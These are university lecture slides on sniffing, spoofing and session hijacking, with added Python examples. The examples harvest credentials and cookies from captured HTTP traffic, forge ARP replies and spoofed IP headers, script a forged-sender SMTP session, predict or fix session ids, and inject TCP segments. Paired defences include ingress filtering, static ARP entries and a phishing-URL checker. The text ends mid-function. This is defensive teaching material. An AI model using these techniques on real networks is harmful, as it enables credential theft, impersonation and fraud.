Politeknik Elektronika Negeri Surabaya
ITS - Surabaya
Dialog Attacks
Sniffing, Spoofing, Session Hijacking
Isbat Uzzin Nadhori
Informatics Engineering, PENS-ITS
Types of Attacks
Physical Access Attacks
- Wiretapping
- Server hacking
- Vandalism
Dialog Attacks
- Eavesdropping (listening to traffic one is not supposed to hear)
- Impersonation (pretending to be someone else)
- Message alteration (changing a message in transit)
Penetration Attacks (attempts to break in)
- Social engineering: opening attachments, password theft, information theft
- Scanning (probing)
- Break-in
- Denial of service
- Malware: viruses, worms
Sniffing
[Figure: a user logs in over the network, typing "login: dgame" and a password (shown as ########); a SNIFFER on the same segment reads both.]
Sniffing is the attempt to read and analyse packets passing over the network using a packet-sniffing program.
Major Problems with Sniffing
- Any malicious machine can examine any packet on a broadcast medium.
- Ethernet is broadcast, at least on the shared (hub) segments a frame travels over. A switch delivers unicast frames only to the destination port, but ARP spoofing (below) pulls the traffic back to the attacker.
- Capturing a password is usually the first step in compromising a machine.
- Email (SMTP, POP3, IMAP without encryption) travels as plaintext and is trivial to read.
What does one sniff?
- passwords
- financial account information
- confidential information
- low-level protocol information useful for further attacks: hardware (MAC) addresses, IP addresses, routing, etc.
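The following Python program, added here as an example and not part of the original slides, shows what a passive sniffer actually does with the bytes on a hub segment: it peels the Ethernet, IPv4 and TCP headers off each frame, keeps the HTTP traffic, and pulls out the form password, the Basic-auth credentials and the session cookie. The capture it runs on is constructed inline (the login name dgame is the one in the figure above; the password, hosts, MAC addresses and cookie are made up), so it runs offline. The same decoder applies to the Session Sniffing slide later in the deck: the cookie it harvests is the session id an attacker replays.

```python
import base64
import struct
from dataclasses import dataclass
from urllib.parse import parse_qsl

ETH_P_IP = 0x0800
IPPROTO_TCP = 6


def ip_to_bytes(ip: str) -> bytes:
    return bytes(int(octet) for octet in ip.split("."))


def build_tcp_frame(src_mac, dst_mac, src_ip, dst_ip, sport, dport, payload):
    """Ethernet + IPv4 + TCP around a payload. Checksums are left zero because the
    decoder below never needs them; this is only used to construct the sample capture."""
    eth = dst_mac + src_mac + struct.pack("!H", ETH_P_IP)
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 40 + len(payload), 0x1234, 0x4000,
                     64, IPPROTO_TCP, 0, ip_to_bytes(src_ip), ip_to_bytes(dst_ip))
    tcp = struct.pack("!HHIIBBHHH", sport, dport, 1000, 2000, 5 << 4, 0x18, 65535, 0, 0)
    return eth + ip + tcp + payload


@dataclass
class Segment:
    src: str
    dst: str
    sport: int
    dport: int
    payload: bytes


def decode_frame(frame: bytes):
    """Peel Ethernet, IPv4 and TCP headers; return None for anything that is not TCP/IP."""
    if struct.unpack("!H", frame[12:14])[0] != ETH_P_IP:
        return None
    ip = frame[14:]
    ihl = (ip[0] & 0x0F) * 4                 # header length in bytes
    if ip[9] != IPPROTO_TCP:
        return None
    tcp = ip[ihl:]
    sport, dport = struct.unpack("!HH", tcp[:4])
    data_offset = (tcp[12] >> 4) * 4
    return Segment(".".join(str(b) for b in ip[12:16]), ".".join(str(b) for b in ip[16:20]),
                   sport, dport, tcp[data_offset:])


def harvest_http(payload: bytes) -> dict:
    """Pull secrets out of a plaintext HTTP request: Basic auth header, session cookie, form body."""
    head, _, body = payload.decode("latin-1").partition("\r\n\r\n")
    found = {}
    for line in head.split("\r\n")[1:]:     # skip the request line
        name, _, value = line.partition(":")
        name, value = name.strip().lower(), value.strip()
        if name == "authorization" and value.lower().startswith("basic "):
            found["basic_auth"] = base64.b64decode(value[6:]).decode("latin-1")
        elif name == "cookie":
            found["cookie"] = value
    if body:
        found["form"] = dict(parse_qsl(body))
    return found


def sniff(frames, http_ports=(80, 8080)) -> list:
    """The passive sniffer loop: decode every frame seen on the wire, keep HTTP, harvest."""
    harvested = []
    for frame in frames:
        seg = decode_frame(frame)
        if seg is None or seg.dport not in http_ports:
            continue
        secrets_found = harvest_http(seg.payload)
        if secrets_found:
            harvested.append({"flow": f"{seg.src}:{seg.sport} -> {seg.dst}:{seg.dport}", **secrets_found})
    return harvested


# Constructed capture (not real traffic): a login POST, a request with Basic auth,
# an ARP frame the sniffer must skip, and a request carrying the issued session cookie.
CLIENT_MAC = bytes.fromhex("00aa00bb00cc")
SERVER_MAC = bytes.fromhex("00dd00ee00ff")
CAPTURE = [
    build_tcp_frame(CLIENT_MAC, SERVER_MAC, "192.0.2.10", "192.0.2.80", 40001, 80,
                    b"POST /login HTTP/1.1\r\nHost: mail.example\r\n"
                    b"Content-Type: application/x-www-form-urlencoded\r\n\r\n"
                    b"login=dgame&passwd=s3cret"),
    build_tcp_frame(CLIENT_MAC, SERVER_MAC, "192.0.2.10", "192.0.2.80", 40002, 80,
                    b"GET / HTTP/1.1\r\nHost: mail.example\r\nAuthorization: Basic "
                    + base64.b64encode(b"dgame:s3cret") + b"\r\n\r\n"),
    b"\xff" * 6 + CLIENT_MAC + struct.pack("!H", 0x0806) + b"\x00" * 28,
    build_tcp_frame(CLIENT_MAC, SERVER_MAC, "192.0.2.10", "192.0.2.80", 40003, 80,
                    b"GET /inbox HTTP/1.1\r\nHost: mail.example\r\n"
                    b"Cookie: JSESSIONID=7f3a9c2e\r\n\r\n"),
]
```

Running `sniff(CAPTURE)` yields one record per HTTP request with the password, the decoded Basic credentials and the cookie; the ARP frame is silently skipped. Nothing here is clever: the point of the slide is that on a shared medium this is all an attacker has to do.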
Spoofing
In spoofing (fooling, deceiving), an attacker impersonates someone else.
[Figure: three parties, Aaron, Tom and David. Aaron asks "David, is that you?" and gets the answer "Yes, I'm here!" from someone posing as David.]
Types of Spoofing
- ARP spoofing / MAC spoofing: the attacker answers ARP with his own MAC address for another host's IP address, so the victim's frames are delivered to the attacker's card.
- IP spoofing: the attacker uses the IP address of another computer to acquire information or gain access.
- Email spoofing: the attacker sends email but makes it appear to come from someone else.
- Web spoofing: the attacker tricks the web browser into communicating with a different web server than the user intended.
- Non-network spoofing (social engineering).
MAC Level Spoofing
- Focus on Ethernet, because of its widespread use.
- Cards are given unique addresses by the manufacturer.
- Many cards CAN be reconfigured by the user to transmit with a different source address.
- A bridge has no MAC address of its own on the forwarding path; it sends frames on with the source address of the originator, so a forged address passes through unchanged.
- A faked address opens opportunities for mischief.
Finding the Owner of a MAC Address
[Figure. The first three bytes of a MAC address are the manufacturer's OUI, registered with the IEEE, so the vendor of a card can be looked up from its address; the remaining three bytes are assigned by that vendor.]
ARP Table Modifications
Host A, however, has no way of knowing whether the ARP reply really came from Host B: ARP replies carry no authentication.
In the previous example, an attacker could send Host A a spoofed ARP reply before Host B responds, stating that hardware address E0:E0:E0:E0:E0:E0 (the attacker's) corresponds to Host B's IP address. Host A would then send all traffic intended for Host B to the attacker, who could choose to forward that data (probably after some tampering) to Host B so that the connection keeps working and nobody notices.
Spoofed Reply
[Figure: the attacker's spoofed ARP reply reaching Host A, as described above.]
ARP Spoofing
What is ARP? The protocol that resolves an IP address to a MAC address on the local segment.
Goal: make another machine believe that the IP address it is looking up belongs to you.
How it works: the host broadcasts a request asking who has the address. The response normally comes from the machine that owns that IP, but nothing stops anyone else from answering, and the requester caches whatever reply it gets.
ARP Spoofing (more)
If two machines (the real one and the fake) respond, the effect depends on the operating system:
- some stacks overwrite the earlier response with the later one,
- others ignore further replies until the current entry expires.
The original machine can also be taken out of the race by cutting its power or its wiring (connectivity).
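Added example (Python, not from the original deck): ARP reply frames are built and parsed at byte level and fed to a model of a victim's ARP cache that reproduces the two OS behaviours above, plus the race in which the attacker answers first. The MAC and IP addresses are constructed; the attacker MAC is the E0:E0:E0:E0:E0:E0 used in the ARP Table Modifications slide. The static-entry path shows why a permanent cache entry (the defence in the prevention slide) is immune.

```python
import struct

ETH_P_ARP = 0x0806
ARP_REQUEST, ARP_REPLY = 1, 2


def mac_bytes(mac: str) -> bytes:
    return bytes.fromhex(mac.replace(":", ""))


def mac_str(raw: bytes) -> str:
    return ":".join(f"{b:02x}" for b in raw)


def ip_bytes(ip: str) -> bytes:
    return bytes(int(o) for o in ip.split("."))


def ip_str(raw: bytes) -> str:
    return ".".join(str(b) for b in raw)


def build_arp(op, sender_mac, sender_ip, target_mac, target_ip) -> bytes:
    """Ethernet frame carrying an RFC 826 ARP packet (Ethernet hardware type, IPv4 protocol type)."""
    eth_dst = mac_bytes("ff:ff:ff:ff:ff:ff") if op == ARP_REQUEST else mac_bytes(target_mac)
    eth = eth_dst + mac_bytes(sender_mac) + struct.pack("!H", ETH_P_ARP)
    arp = struct.pack("!HHBBH6s4s6s4s", 1, 0x0800, 6, 4, op,
                      mac_bytes(sender_mac), ip_bytes(sender_ip),
                      mac_bytes(target_mac), ip_bytes(target_ip))
    return eth + arp


def parse_arp(frame: bytes):
    if struct.unpack("!H", frame[12:14])[0] != ETH_P_ARP:
        return None
    _, _, _, _, op, smac, sip, tmac, tip = struct.unpack("!HHBBH6s4s6s4s", frame[14:42])
    return {"op": op, "sender_mac": mac_str(smac), "sender_ip": ip_str(sip),
            "target_mac": mac_str(tmac), "target_ip": ip_str(tip)}


class ArpCache:
    """Model of one host's ARP cache. ARP trusts every reply; the only questions are whether
    an unsolicited reply may overwrite an entry (stack-dependent, as the slide says) and
    whether the administrator pinned the entry statically."""

    def __init__(self, accept_unsolicited: bool):
        self.accept_unsolicited = accept_unsolicited
        self.table = {}       # ip -> (mac, is_static)
        self.pending = set()  # ips with an outstanding request of our own

    def add_static(self, ip: str, mac: str) -> None:
        self.table[ip] = (mac, True)

    def send_request(self, ip: str) -> None:
        self.pending.add(ip)

    def handle(self, frame: bytes) -> bool:
        """Process a received frame; return True if the cache was updated."""
        arp = parse_arp(frame)
        if arp is None or arp["op"] != ARP_REPLY:
            return False
        ip, mac = arp["sender_ip"], arp["sender_mac"]
        entry = self.table.get(ip)
        if entry and entry[1]:
            return False                     # static entry: never overwritten by ARP
        if ip not in self.pending and not self.accept_unsolicited:
            return False                     # not asked for, and this stack ignores gratuitous replies
        self.table[ip] = (mac, False)        # no authentication: whoever is believed last, wins
        self.pending.discard(ip)
        return True

    def lookup(self, ip: str):
        entry = self.table.get(ip)
        return entry[0] if entry else None


# Constructed addresses; the attacker MAC is the one the slides use.
VICTIM_MAC, VICTIM_IP = "00:11:22:33:44:55", "192.0.2.10"
GATEWAY_MAC, GATEWAY_IP = "00:aa:bb:cc:dd:ee", "192.0.2.1"
ATTACKER_MAC = "e0:e0:e0:e0:e0:e0"


def run_scenario(accept_unsolicited: bool, attacker_first: bool = False, static: bool = False):
    """Victim resolves the gateway; the real gateway and the attacker both reply.
    Returns the MAC the victim ends up using for the gateway's IP."""
    victim = ArpCache(accept_unsolicited)
    if static:
        victim.add_static(GATEWAY_IP, GATEWAY_MAC)
    victim.send_request(GATEWAY_IP)
    genuine = build_arp(ARP_REPLY, GATEWAY_MAC, GATEWAY_IP, VICTIM_MAC, VICTIM_IP)
    spoofed = build_arp(ARP_REPLY, ATTACKER_MAC, GATEWAY_IP, VICTIM_MAC, VICTIM_IP)  # attacker claims the gateway IP
    for reply in ([spoofed, genuine] if attacker_first else [genuine, spoofed]):
        victim.handle(reply)
    return victim.lookup(GATEWAY_IP)
```

With `accept_unsolicited=True` the later (spoofed) reply wins; with `False` the genuine reply survives unless the attacker answered the request first, which is exactly the race the ARP Table Modifications slide describes; a static entry is never changed in either case.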
IP Spoofing
- IP spoofing is the creation of TCP/IP packets with somebody else's IP address in the source field of the header.
- Routers forward on the destination address and, unless ingress filtering is configured, never check whether the source address belongs on the interface the packet arrived on.
- The source address is used only by the destination machine, when it replies.
- When an attacker spoofs someone's IP address, the victim's replies go back to that address, not to the attacker.
- Because the attacker never sees the replies, this is called a one-way attack or blind spoofing.
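Added example, not from the slides: a raw IPv4 header is built with a forged source address and a correct checksum, a destination-only forwarding lookup shows that the router does not care, and a BCP 38 style ingress filter shows the check that would catch the packet at the network edge (the "router filters" countermeasure later in the deck). The addresses come from the documentation ranges; interface names and routes are constructed.

```python
import ipaddress
import struct


def inet_checksum(data: bytes) -> int:
    """RFC 1071 ones-complement checksum over 16-bit words."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack(f"!{len(data) // 2}H", data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return ~total & 0xFFFF


def build_ipv4(src: str, dst: str, payload: bytes, proto: int = 6, ttl: int = 64) -> bytes:
    """Raw IPv4 datagram. Nothing stops the sender from writing any source address it likes;
    the checksum is simply computed over whatever is in the header."""
    header = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(payload), 0x1000, 0x4000, ttl, proto, 0,
                         ipaddress.IPv4Address(src).packed, ipaddress.IPv4Address(dst).packed)
    header = header[:10] + struct.pack("!H", inet_checksum(header)) + header[12:]
    return header + payload


def parse_ipv4(packet: bytes) -> dict:
    f = struct.unpack("!BBHHHBBH4s4s", packet[:20])
    return {"src": str(ipaddress.IPv4Address(f[8])), "dst": str(ipaddress.IPv4Address(f[9])),
            "proto": f[6], "ttl": f[5],
            "checksum_ok": inet_checksum(packet[:20]) == 0}   # a valid header sums to zero


def forward(packet: bytes, routes: list) -> str:
    """Plain destination-based forwarding, as the slide describes: the source is never consulted."""
    dst = ipaddress.ip_address(parse_ipv4(packet)["dst"])
    for prefix, iface in routes:                      # most specific first
        if dst in ipaddress.ip_network(prefix):
            return iface
    return "drop"


class IngressFilter:
    """BCP 38 style source-address validation at the edge: a packet arriving on an access
    interface must carry a source address from the prefixes assigned to that interface."""

    def __init__(self, allowed: dict):
        self.allowed = {iface: [ipaddress.ip_network(p) for p in prefixes]
                        for iface, prefixes in allowed.items()}

    def permits(self, ingress_iface: str, packet: bytes) -> bool:
        src = ipaddress.ip_address(parse_ipv4(packet)["src"])
        return any(src in net for net in self.allowed.get(ingress_iface, []))


# Constructed topology: customer LAN 192.0.2.0/24 behind "customer0", victim network via "uplink".
ROUTES = [("203.0.113.0/24", "uplink"), ("192.0.2.0/24", "customer0")]
EDGE = IngressFilter({"customer0": ["192.0.2.0/24"]})


def demo() -> dict:
    # Attacker on the customer LAN forges source 198.51.100.7: the victim's replies go there, not to him.
    spoofed = build_ipv4("198.51.100.7", "203.0.113.9", b"SYN")
    honest = build_ipv4("192.0.2.25", "203.0.113.9", b"SYN")
    return {
        "spoofed_header_valid": parse_ipv4(spoofed)["checksum_ok"],
        "router_would_forward_to": forward(spoofed, ROUTES),
        "edge_filter_permits_spoofed": EDGE.permits("customer0", spoofed),
        "edge_filter_permits_honest": EDGE.permits("customer0", honest),
    }
```

The forged header is perfectly well formed and the core router forwards it on the destination alone; only the edge filter, which knows which sources may legitimately appear on `customer0`, rejects it. That is why the countermeasure belongs at the edge closest to the sender.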
Email Spoofing
Three basic ways to do it:
- Aliasing: create a valid email account (on Yahoo or Hotmail, for instance) and put someone else's name in the display-name (alias) field.
- Modify the mail client so that it puts an arbitrary From: address on outgoing mail.
- Telnet to port 25 and type the SMTP commands by hand.
Mail relaying: an attacker uses somebody else's mail server (an open relay) to send mail to recipients in a different domain, hiding his own origin.
When a message is submitted, the server does not validate the From: header or the envelope sender (MAIL FROM) against the identity of whoever is sending it.
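The "telnet to port 25" exchange described above, as an added Python example that is not part of the original slides. A toy SMTP server state machine is driven with the commands an attacker would type; a relay policy decides whether the forged message is queued, and the session records the unverified envelope sender and From: header. Domains, addresses and the message are constructed, and the reply strings imitate common SMTP responses.

```python
import ipaddress


class RelayPolicy:
    """Who may this server deliver for? Local domains: always (inbound mail for our users).
    Other domains: only from our own client networks. An open relay sets relay_networks to
    everything, which is exactly what spammers and spoofers look for."""

    def __init__(self, local_domains, relay_networks):
        self.local_domains = {d.lower() for d in local_domains}
        self.relay_networks = [ipaddress.ip_network(n) for n in relay_networks]

    def may_deliver(self, client_ip: str, recipient: str) -> bool:
        domain = recipient.rsplit("@", 1)[-1].lower()
        if domain in self.local_domains:
            return True
        client = ipaddress.ip_address(client_ip)
        return any(client in net for net in self.relay_networks)


class SmtpSession:
    """Minimal SMTP server (RFC 5321 subset). Feed one client line at a time; get the
    server reply back, or None while it is swallowing message body lines."""

    def __init__(self, policy: RelayPolicy, client_ip: str):
        self.policy, self.client_ip = policy, client_ip
        self.mail_from, self.recipients, self.body, self.in_data = None, [], [], False

    @staticmethod
    def _address(arg: str) -> str:            # "FROM:<a@b>" -> "a@b"
        return arg.split(":", 1)[-1].strip().strip("<>")

    def feed(self, line: str):
        if self.in_data:
            if line == ".":
                self.in_data = False
                return "250 2.0.0 Ok: queued"
            self.body.append(line)
            return None
        verb, _, arg = line.partition(" ")
        verb = verb.upper()
        if verb in ("HELO", "EHLO"):
            return "250 relay.example"
        if verb == "MAIL":
            self.mail_from = self._address(arg)   # taken on faith: nothing ties it to the client
            return "250 2.1.0 Ok"
        if verb == "RCPT":
            rcpt = self._address(arg)
            if not self.policy.may_deliver(self.client_ip, rcpt):
                return "554 5.7.1 Relay access denied"
            self.recipients.append(rcpt)
            return "250 2.1.5 Ok"
        if verb == "DATA":
            if not self.recipients:
                return "503 5.5.1 Error: need RCPT command"
            self.in_data = True
            return "354 End data with <CR><LF>.<CR><LF>"
        if verb == "QUIT":
            return "221 2.0.0 Bye"
        return "502 5.5.2 Error: command not recognized"

    def header_from(self):
        """The From: the recipient's mail client will display; also never checked."""
        for line in self.body:
            if line == "":
                break
            if line.lower().startswith("from:"):
                return line[5:].strip()
        return None


def run_session(policy: RelayPolicy, client_ip: str, client_lines: list):
    session = SmtpSession(policy, client_ip)
    replies = [r for r in (session.feed(line) for line in client_lines) if r is not None]
    return replies, session


# Constructed: what an attacker types after "telnet mailserver 25" to forge a message.
SPOOFED_SESSION = [
    "HELO attacker.example",
    "MAIL FROM:<ceo@bank.example>",
    "RCPT TO:<victim@partner.example>",
    "DATA",
    "From: The CEO <ceo@bank.example>",
    "To: victim@partner.example",
    "Subject: Urgent wire transfer",
    "",
    "Please move the funds today.",
    ".",
    "QUIT",
]
OPEN_RELAY = RelayPolicy(local_domains=["relay.example"], relay_networks=["0.0.0.0/0"])
CLOSED_RELAY = RelayPolicy(local_domains=["relay.example"], relay_networks=["192.0.2.0/24"])
ATTACKER_IP = "203.0.113.5"   # not in the relay's own network
```

Against `OPEN_RELAY` the forged message is queued for a third-party domain; against `CLOSED_RELAY` the RCPT is refused with 554 and nothing is sent. Note the limit of that countermeasure: the closed relay still accepts the same forged MAIL FROM when the recipient is in its own domain, because restricting relaying controls whom the server delivers for, not who the sender claims to be.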
Web Spoofing
One way to lure people to a malicious site is to give it a URL that looks like that of a legitimate site, e.g.
www.paypai.com (an i in place of the l)
wwwFirstNationalBank.com (the dot after www dropped, so this is a different registration)
Another way is to provide HTML with a mislabeled link, e.g. in an email: the link text says one thing and the HREF points somewhere else. Example:
<a HREF="http://www.badhack.org"> American Red Cross</a>
Fake URL
A fake URL is one that claims to lead to a particular web site but, when clicked, actually takes the user to an attacker's site. The URL is the web address of a site, and it carries clues that may reveal a fake or phishing site.
Defence:
- One of the first rules of online security is to exercise caution at all times. Avoid clicking on links in pop-up ads or in emails that seem phony or suspicious. A good general rule is to type the web site address into the address bar yourself rather than follow a link in an email message, especially for a financial site.
- Check the target of a link in an email or on another web site by hovering the mouse over it. The URL appears in the browser status bar (usually at the bottom of the window), so the real destination can be read before clicking.
- An "@" in the middle of a URL is a strong warning sign. Everything between the scheme and the "@" is treated as a user name, not as the host name; the browser connects to whatever follows the "@". A URL of the form http://www.paypal.com@<attacker's host>/ therefore does not go to PayPal at all. Legitimate sites and companies use a plain domain name, never this form, and many modern browsers reject, strip or warn about it.
- Basic spelling mistakes in the address itself are a dead giveaway. Some URLs look very much like the name of a well-known company but with letters transposed or left out, e.g. "mircosoft.com" instead of "microsoft.com". The differences are easy to miss, and that is what phishers count on.
- PayPal is a common target for phishers and scammers. Even if a URL contains the word "paypal", it may not be the authentic PayPal site: www.paypalsecure.com, for instance, is not PayPal, and neither is any URL that only has "paypal.com" to the left of an "@".
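An added example (Python; not from the original slides) that turns the clues above into checks a mail gateway or browser extension could run: it flags userinfo before an "@", a missing dot after www, a brand name buried in a different domain, near-miss spellings, and link text that shows a different host than the href. The brand list and the sample URLs that do not appear on the slide are constructed. The heuristics are deliberately simple, and the Red Cross case shows their limit: a mislabelled link whose text contains no host name gets no automated warning.

```python
import re
from urllib.parse import urlsplit

# Constructed allow-list: brand keyword -> the registrable domain it legitimately uses.
KNOWN_BRANDS = {"paypal": "paypal.com", "microsoft": "microsoft.com"}
IPV4_RE = re.compile(r"\d{1,3}(\.\d{1,3}){3}")
HOST_IN_TEXT_RE = re.compile(r"(?:[a-z0-9-]+\.)+[a-z]{2,}")


def levenshtein(a: str, b: str) -> int:
    """Edit distance; a small value between a host label and a brand suggests typosquatting."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def registrable_domain(host: str) -> str:
    """Last two labels; good enough for .com/.org here (real code would use the public suffix list)."""
    return ".".join(host.lower().rstrip(".").split(".")[-2:])


def inspect_url(url: str, link_text: str = None) -> list:
    """Return the warning signs from the slide that apply to one URL (and to the link text, if given)."""
    warnings = []
    parts = urlsplit(url if "://" in url else "http://" + url)
    host = parts.hostname or ""
    if parts.username is not None:
        warnings.append(f"userinfo before '@': the browser connects to {host!r}, not to {parts.username!r}")
    is_ip = bool(IPV4_RE.fullmatch(host))
    domain = host if is_ip else registrable_domain(host)
    if not is_ip:
        label = domain.split(".")[0]
        if label.startswith("www") and len(label) > 3:
            warnings.append("'www' glued to the name (missing dot): a different registration, not a subdomain")
        for brand, legit in KNOWN_BRANDS.items():
            if domain == legit:
                continue
            if brand in label:
                warnings.append(f"contains brand {brand!r} but is not {legit}")
            elif 0 < levenshtein(label, brand) <= 2:
                warnings.append(f"{label!r} is a near miss for {brand!r}: possible typosquat")
    if link_text:
        shown = HOST_IN_TEXT_RE.search(link_text.lower())
        if shown and registrable_domain(shown.group(0)) != domain:
            warnings.append(f"link text shows {shown.group(0)!r} but the href goes to a different host {host!r}")
    return warnings


# Constructed samples, including the ones from the slides; value is the link text, if any.
SAMPLES = {
    "http://www.paypal.com/": None,
    "http://www.paypai.com/": None,
    "http://wwwFirstNationalBank.com/": None,
    "http://www.paypal.com@203.0.113.10/": None,
    "http://www.paypalsecure.com/": None,
    "http://mircosoft.com/": None,
    "http://www.badhack.org": "American Red Cross",
    "http://203.0.113.10/login": "https://www.paypal.com/login",
}

if __name__ == "__main__":
    for url, text in SAMPLES.items():
        print(url, "->", inspect_url(url, text) or "no automated warning")
```

`urlsplit` does the same parsing the browser does, which is what makes the "@" check reliable: the `hostname` attribute is always the part to the right of the user name. The distance threshold of 2 fits the brand names used here; shorter brand names would need a tighter bound to avoid false positives.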
TCP Session Hijacking
TCP session hijacking is when an attacker takes over an established TCP session between two machines.
Since most authentication happens only at the start of a TCP session, taking over the session after that point gives the attacker authenticated access to the machine without ever knowing the password.
Categories of TCP Session Hijacking
Depending on whether the attacker can observe the sequence numbers or has to predict them, there are two types of TCP hijacking:
- Man-in-the-middle (MITM), where the sequence numbers are read from the traffic
- Blind hijacking, where they have to be guessed
Passive Sniffers
A passive sniffer simply monitors packets on a network where it shares the collision domain with the victim (i.e. a hub-based network, where every packet is repeated on every port). It transmits nothing of its own and is therefore hard to detect.
Active Sniffers
On a switched network the attacker's port does not see the victim's traffic, so an active sniffer has to redirect it. One way is to change the client machine's default gateway so that it routes its packets via the hijacker's machine.
This is done by ARP spoofing: the attacker sends forged ARP packets that map his own MAC address to the default gateway's IP address, which updates the ARP cache on the client and redirects its traffic to the hijacker.
Typical Session
[Figure: client (browser), server, session data store]
1. Client requests a connection
2. Server creates a session
3. Server returns the session id to the client
4. Client's subsequent requests carry the session id
5. Server validates the session id
6. Server retrieves the session data
7. Server returns the successful response
Attack Methods
- Guessing session ids: short or predictable ids
- Session fixing: predictable ids, or a session whose id is chosen before the user authenticates and kept afterwards
- Security vulnerabilities in the hops between client and server: trusting private networks, vulnerabilities in web servers, etc.
- Session sniffing (typical for sessions without SSL): requires being on the same subnet as the client or the server
- Man-in-the-middle attack (even on SSL): ARP poisoning, DNS spoofing
- Cross-site scripting (XSS): the user trusts the source, while an application vulnerability lets the attacker's script read the session id
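Added Python example (not from the slides) for the first two attack methods: a sequential session-id generator beside one backed by the OS CSPRNG, the attacker's prediction step, and a session store that either adopts a client-supplied id and keeps it across login (session fixation) or ignores unknown ids and rotates the id at login. The id formats, the planted id and the user name dgame are constructed.

```python
import math
import secrets


class WeakSessionIds:
    """Sequential ids padded to eight digits: short, and the next one is obvious."""

    def __init__(self, start: int = 1000):
        self.counter = start

    def new(self) -> str:
        self.counter += 1
        return f"{self.counter:08d}"


class StrongSessionIds:
    """32 random bytes from the OS CSPRNG, URL-safe base64: 256 bits, nothing to extrapolate."""

    def new(self) -> str:
        return secrets.token_urlsafe(32)


def predict_next(observed: list):
    """Attacker's side of 'guessing session ids': collect a few ids, look for a constant stride."""
    try:
        values = [int(s) for s in observed]
    except ValueError:
        return None                                    # not even numeric
    strides = {b - a for a, b in zip(values, values[1:])}
    if len(strides) != 1:
        return None
    return f"{values[-1] + strides.pop():0{len(observed[-1])}d}"


def bits_of_entropy(sample: str, alphabet: int) -> float:
    """Upper bound on the search space an attacker faces, assuming uniform symbols."""
    return len(sample) * math.log2(alphabet)


class SessionStore:
    """Server-side sessions. strict=False reproduces the 'session fixing' weakness: the server
    adopts any id the client presents and keeps it across login. strict=True ignores unknown
    ids and rotates the id at login, so a pre-planted id never becomes authenticated."""

    def __init__(self, idgen, strict: bool):
        self.idgen, self.strict, self.sessions = idgen, strict, {}

    def visit(self, presented: str = None) -> str:
        if presented in self.sessions:
            return presented
        sid = presented if (presented is not None and not self.strict) else self.idgen.new()
        self.sessions[sid] = {"user": None}
        return sid

    def login(self, sid: str, user: str) -> str:
        if self.strict:                                # regenerate: the old id is now worthless
            fresh = self.idgen.new()
            self.sessions[fresh] = self.sessions.pop(sid)
            sid = fresh
        self.sessions[sid]["user"] = user
        return sid

    def whoami(self, sid: str):
        return self.sessions.get(sid, {}).get("user")


def fixation_attack(store: SessionStore):
    """Attacker plants an id he knows in the victim's browser (e.g. via a crafted link),
    the victim logs in, and the attacker then presents the planted id himself."""
    planted = "00009999"                               # constructed: any value the attacker knows
    victim_sid = store.visit(planted)
    store.login(victim_sid, "dgame")
    return store.whoami(planted)
```

With the weak generator, three observed ids are enough to name the fourth; with the strong one there is nothing to extrapolate. The fixation attack only works when the server both honours a client-chosen id and fails to regenerate it at login; doing either check alone would still leave the other hole, which is why the strict store does both.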
Session Sniffing
[Figure: the same client, server and session store as in the typical session, with an attacker sniffing the wire]
1. Client requests a connection
2. Server creates a session
3. Server returns the session id to the client
4. Client's subsequent requests carry the session id; the attacker sniffs it off the wire
5. Server validates the session id
6. Server retrieves the session data
7. Server returns the successful response
The attacker then sends his own request carrying the sniffed session id and receives a successful response, as if he were the client.
Man-in-the-middle (MITM)
An attacker can also sit "inline" between the two hosts (B and C) and use a sniffing program to watch the sequence and acknowledgement numbers in the TCP segments exchanged between B and C, then inject his own segments with the right numbers and take over the connection.
This is known as a man-in-the-middle attack.
Man in the Middle Attack Using Packet Sniffers
This technique uses a packet sniffer to intercept the communication between the client and the server.
Packet sniffers come in two categories:
- active sniffers
- passive sniffers
Blind Hijacking [Shray Kapoor]
If you are NOT able to sniff the packets, and so cannot learn the sequence number the server expects, you have to fall back on blind session hijacking.
The 32-bit sequence number has about 4.3 billion possible values, so guessing it by brute force is unreliable, and the attacker never sees the server's replies, which go to the real client.
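Added example, not part of the original slides: the acceptance test a TCP receiver applies to an incoming segment, and what it means for the two hijacking styles above. With a sniffed segment the attacker computes the server's next expected sequence number exactly, and one forged segment is delivered to the application; a blind attacker guessing across the 32-bit space rarely lands even inside the receive window. The telnet session and the injected command are constructed.

```python
import random
import struct

SEQ_SPACE = 2 ** 32


def in_window(seq: int, rcv_nxt: int, rcv_wnd: int) -> bool:
    """RFC 793 acceptability test for the first byte of a segment: it must fall in
    [RCV.NXT, RCV.NXT + RCV.WND), computed modulo 2^32."""
    return (seq - rcv_nxt) % SEQ_SPACE < rcv_wnd


class TcpReceiver:
    """Receive side of an established connection (the server end here). Tracks only the
    sequence state needed for the acceptance check; a real stack also checks the ACK
    field, which a blind attacker has to guess as well."""

    def __init__(self, rcv_nxt: int, rcv_wnd: int):
        self.rcv_nxt, self.rcv_wnd = rcv_nxt, rcv_wnd
        self.delivered = []            # payloads handed to the application

    def segment(self, seq: int, payload: bytes) -> bool:
        if not in_window(seq, self.rcv_nxt, self.rcv_wnd):
            return False               # outside the window: dropped (or answered with a bare ACK)
        if seq == self.rcv_nxt:        # exactly the next expected byte: delivered immediately
            self.delivered.append(payload)
            self.rcv_nxt = (self.rcv_nxt + len(payload)) % SEQ_SPACE
        return True                    # in-window but out of order would be buffered


def sniffed_seq_ack(tcp_header: bytes) -> tuple:
    """What a sniffer on the path reads straight out of the TCP header."""
    return struct.unpack("!II", tcp_header[4:12])


def hijack_with_sniffer(server: TcpReceiver, client_tcp_header: bytes,
                        client_payload: bytes, forged_payload: bytes) -> bool:
    """The attacker saw the client's last segment, so the server's RCV.NXT is known exactly:
    that segment's SEQ plus the bytes it carried. One forged segment lands in order."""
    seq, _ack = sniffed_seq_ack(client_tcp_header)
    return server.segment((seq + len(client_payload)) % SEQ_SPACE, forged_payload)


def hijack_blind(server: TcpReceiver, attempts: int, rng: random.Random) -> int:
    """The attacker cannot sniff: every guess is a shot across the full 32-bit space.
    Returns how many guesses even landed inside the window."""
    return sum(server.segment(rng.randrange(SEQ_SPACE), b"x") for _ in range(attempts))


def expected_blind_attempts(rcv_wnd: int) -> int:
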